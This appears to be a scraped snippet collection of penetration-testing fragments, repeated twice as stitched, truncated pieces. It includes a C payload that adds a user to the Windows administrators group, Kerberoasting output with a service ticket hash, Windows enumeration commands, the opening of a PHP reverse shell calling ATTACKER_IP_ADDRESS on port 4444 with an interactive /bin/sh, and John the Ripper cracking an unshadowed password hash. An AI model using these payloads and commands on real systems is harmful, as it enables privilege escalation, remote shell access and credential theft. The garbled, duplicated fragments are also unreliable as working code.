c0d3x27 c0d3x27

## test.csproj
<Project Sdk="Microsoft.NET.Sdk">

  <PropertyGroup>
    <OutputType>Exe</OutputType>
    <TargetFramework>net7.0</TargetFramework>
    <ImplicitUsings>enable</ImplicitUsings>
    <Nullable>enable</Nullable>
  </PropertyGroup>

</Project>

## \main.c
void DoStuff() {

    // Replace all this code by your payload
    STARTUPINFO si = { sizeof(STARTUPINFO) };
    PROCESS_INFORMATION pi;
    CreateProcess(L"c:\\windows\\system32\\cmd.exe",L" /C net localgroup administrators user /add",
        NULL, NULL, FALSE, NORMAL_PRIORITY_CLASS, NULL, L"C:\\Windows", &si, &pi);

    CloseHandle(pi.hProcess);
    CloseHandle(pi.hThread);

## \storsvc_c.c
#if defined(_M_AMD64)

//#define WIN10
//#define WIN11
#define WIN2019
//#define WIN2022

## Invoke-Kerberoasting.ps1
PS C:\Users\webapp\desktop> Invoke-Kerberoast


TicketByteHexStream  :
Hash                 : $krb5tgs$DANTE-DC/SQLService.home.local:60111:300B038D9A7EE3817D464C6668519294$F74FB4903769BCEF2
                       C04C086C67313A03B9E6E902E99E98C6A13755E5DA536494FC4800C3651311E8B3859DB017F3A2483339F7E377E91B55
                       742E95E50A3B9A648C3F6D02B8E9AE385EF03A0B3F0662216806CE64C4703BB8CD9679D58F3DAE8A440DA3CACCE0B4B5
                       880A17C14DA7CEDAB7CA916BABF3912380FB27F6089FD5829545FEE4DB1DBB318D7B8A0F46DECA9CE34B3EC468C96385
                       33D0C1E947A121F55FC42EDD6BE23DDDE1759697E448CA35555D567A38183D465A39D6735764F435A9DB15ED33B5F5FA
                       3D4DF52B8996344D024C4F9FCB8D7DE50892B0D1060EB2E99C2FAF2786ED4C14B39C57FB1E3CDC9531FAC258997760DE

## cmd.exe
C:\Users\webapp>schtasks /query /fo LIST /v

Folder: \
HostName:                             CLIENT666
TaskName:                             \OneDrive Reporting Task-S-1-5-21-1067839273-4045514936-2334618042-1103
Next Run Time:                        2/25/2023 2:36:41 PM
Status:                               Ready
Logon Mode:                           Interactive only
Last Run Time:                        2/24/2023 3:52:53 PM
Last Result:                          0

## cmd.exe
C:\Users\webapp>netsh advfirewall firewall show rule name=all

Rule Name:                            Windows Web Experience Pack
----------------------------------------------------------------------
Enabled:                              Yes
Direction:                            Out
Profiles:                             Domain,Private,Public
Grouping:                             Windows Web Experience Pack
LocalIP:                              Any
RemoteIP:                             Any

## cmd.exe
C:\Users\webapp>netsh advfirewall show currentprofile

Domain Profile Settings:
----------------------------------------------------------------------
State                                 ON
Firewall Policy                       BlockInbound,AllowOutbound
LocalFirewallRules                    N/A (GPO-store only)
LocalConSecRules                      N/A (GPO-store only)
InboundUserNotification               Enable
RemoteManagement                      Disable

## mybackdoor.php
<?php
    $ip = 'ATTACKER_IP_ADDRESS';
    $port = '4444';
    $chunk_size = 1400;
    $write_a = null;
    $error_a = null;
    $shell = 'uname -a; w; id; /bin/sh -i';
    $daemon = 0;
    $debug = 0;
    set_time_limit (0);

## john wordlist.txt
kali@kali:~$ john --rules --wordlist=/tmp/worlist.txt unshadowed.txt
Using default input encoding: UTF-8
Loaded 1 password hash (MD5, crypt(3) $1$ [MD5)
Cost 1 (iteration count) is 5000 for all loaded hashes
Will run 2 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
Doris1995           (victim)
1g 0:00:00:28 DONE (2022-09-27 15:42) 0.03559g/s 2497p/s 2497c/s 2497C/s

## unshadow.txt
kali@kali:~$ unshadow passwd-file.txt shadow-file.txt
victim:$1$fOS.xfbT$5c5vh3Zrk.88SbCWP1nrjgccgYvCC/x7SEcjSujtrvQfkO4pSWHaGxZojNy.vAqMGrBBNOb0P3pW1ybxm2OIT/:1003:1003:,,,:/home/victim:/bin/bash

kali@kali:~$ unshadow passwd.txt shadow.txt > unshadowed.txt
	<Project Sdk="Microsoft.NET.Sdk">

	<PropertyGroup>
	<OutputType>Exe</OutputType>
	<TargetFramework>net7.0</TargetFramework>
	<ImplicitUsings>enable</ImplicitUsings>
	<Nullable>enable</Nullable>
	</PropertyGroup>

	</Project>
	void DoStuff() {

	// Replace all this code by your payload
	STARTUPINFO si = { sizeof(STARTUPINFO) };
	PROCESS_INFORMATION pi;
	CreateProcess(L"c:\\windows\\system32\\cmd.exe",L" /C net localgroup administrators user /add",
	NULL, NULL, FALSE, NORMAL_PRIORITY_CLASS, NULL, L"C:\\Windows", &si, &pi);

	CloseHandle(pi.hProcess);
	CloseHandle(pi.hThread);
	#if defined(_M_AMD64)

	//#define WIN10
	//#define WIN11
	#define WIN2019
	//#define WIN2022
	PS C:\Users\webapp\desktop> Invoke-Kerberoast


	TicketByteHexStream :
	Hash : $krb5tgs$DANTE-DC/SQLService.home.local:60111:300B038D9A7EE3817D464C6668519294$F74FB4903769BCEF2
	C04C086C67313A03B9E6E902E99E98C6A13755E5DA536494FC4800C3651311E8B3859DB017F3A2483339F7E377E91B55
	742E95E50A3B9A648C3F6D02B8E9AE385EF03A0B3F0662216806CE64C4703BB8CD9679D58F3DAE8A440DA3CACCE0B4B5
	880A17C14DA7CEDAB7CA916BABF3912380FB27F6089FD5829545FEE4DB1DBB318D7B8A0F46DECA9CE34B3EC468C96385
	33D0C1E947A121F55FC42EDD6BE23DDDE1759697E448CA35555D567A38183D465A39D6735764F435A9DB15ED33B5F5FA
	3D4DF52B8996344D024C4F9FCB8D7DE50892B0D1060EB2E99C2FAF2786ED4C14B39C57FB1E3CDC9531FAC258997760DE
	C:\Users\webapp>schtasks /query /fo LIST /v

	Folder: \
	HostName: CLIENT666
	TaskName: \OneDrive Reporting Task-S-1-5-21-1067839273-4045514936-2334618042-1103
	Next Run Time: 2/25/2023 2:36:41 PM
	Status: Ready
	Logon Mode: Interactive only
	Last Run Time: 2/24/2023 3:52:53 PM
	Last Result: 0
	C:\Users\webapp>netsh advfirewall firewall show rule name=all

	Rule Name: Windows Web Experience Pack
	----------------------------------------------------------------------
	Enabled: Yes
	Direction: Out
	Profiles: Domain,Private,Public
	Grouping: Windows Web Experience Pack
	LocalIP: Any
	RemoteIP: Any
	C:\Users\webapp>netsh advfirewall show currentprofile

	Domain Profile Settings:
	----------------------------------------------------------------------
	State ON
	Firewall Policy BlockInbound,AllowOutbound
	LocalFirewallRules N/A (GPO-store only)
	LocalConSecRules N/A (GPO-store only)
	InboundUserNotification Enable
	RemoteManagement Disable
	<?php
	$ip = 'ATTACKER_IP_ADDRESS';
	$port = '4444';
	$chunk_size = 1400;
	$write_a = null;
	$error_a = null;
	$shell = 'uname -a; w; id; /bin/sh -i';
	$daemon = 0;
	$debug = 0;
	set_time_limit (0);
	kali@kali:~$ john --rules --wordlist=/tmp/worlist.txt unshadowed.txt
	Using default input encoding: UTF-8
	Loaded 1 password hash (MD5, crypt(3) $1$ [MD5)
	Cost 1 (iteration count) is 5000 for all loaded hashes
	Will run 2 OpenMP threads
	Press 'q' or Ctrl-C to abort, almost any other key for status
	Doris1995 (victim)
	1g 0:00:00:28 DONE (2022-09-27 15:42) 0.03559g/s 2497p/s 2497c/s 2497C/s
	kali@kali:~$ unshadow passwd-file.txt shadow-file.txt
	victim:$1$fOS.xfbT$5c5vh3Zrk.88SbCWP1nrjgccgYvCC/x7SEcjSujtrvQfkO4pSWHaGxZojNy.vAqMGrBBNOb0P3pW1ybxm2OIT/:1003:1003:,,,:/home/victim:/bin/bash

	kali@kali:~$ unshadow passwd.txt shadow.txt > unshadowed.txt